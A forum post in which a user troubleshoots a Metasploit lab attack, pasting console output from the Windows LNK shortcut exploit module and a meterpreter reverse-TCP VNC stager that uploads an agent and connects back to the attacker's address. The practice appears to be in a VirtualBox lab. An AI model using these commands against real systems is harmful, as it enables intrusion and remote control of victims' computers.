Hi Hardez,
(Great video)
Just watched your video and tried to reproduce it but I i'm missing something.
I can almost complete the exploit but it binds to my external card as an endpoint
Code:
meterpreter > run vnc[*] Creating a VNC reverse tcp stager: LHOST=10.0.0.95 LPORT=4545)[*] Running payload handler[*] VNC stager executable 73802 bytes long[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\mUCfWD.exe (must be deleted manually)[*] Executing the VNC agent with endpoint 10.0.0.95:4545...
So I tihnk the problem is that it is binding to my physical address and not to my vbox address
So I changed the srvhost in options to 192.168.56.1
but then I get
Code:
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit[*] Exploit running as background job.
[-] Handler failed to bind to 192.168.56.1:4444
[-] Handler failed to bind to 0.0.0.0:4444
[-] Exploit exception: The address is already in use (0.0.0.0:4444).
Sorry if this is in the wrong section, but it was in the noobs section, and I know this is certainly a noob question so i'm not sure..... any help would be appreciated
oh yes - I can open a vnc session no problems using the run one_vnc.rb exploit, so I guess I have the right software?
cheers all
Hi Hardez, Great video I just have a couple of questions - they are noob questions but since the video was moved here I'd still like to ask.
I'm following the exploit but instead of launching the exploit and binding to my Vbox adapter the exploit listens on my physical adapter on a different subnet, so I can't trigger the vulnerability.
I tried to change the srvhost in options but still no go!
here's what I tried
Code:
msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.56.1:4444 [*] [*] Send vulnerable clients to \\10.0.0.95\KfTO\.[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk[*] [*] Using URL: http://0.0.0.0:80/[*] Local IP: http://10.0.0.95:80/[*] Server started.
So my question is howto change the local ip from 10.0.0.95:80 to 192.168.56.1:80?
I really appreciate the video and any feedback it would probably help other noobs too.
Also once the vuln is executed does that automatically start a vnc viewer like the one_vnc.rb exploit?
from room362
hxxp://www.room362.com/blog/month/december-2009
cheers again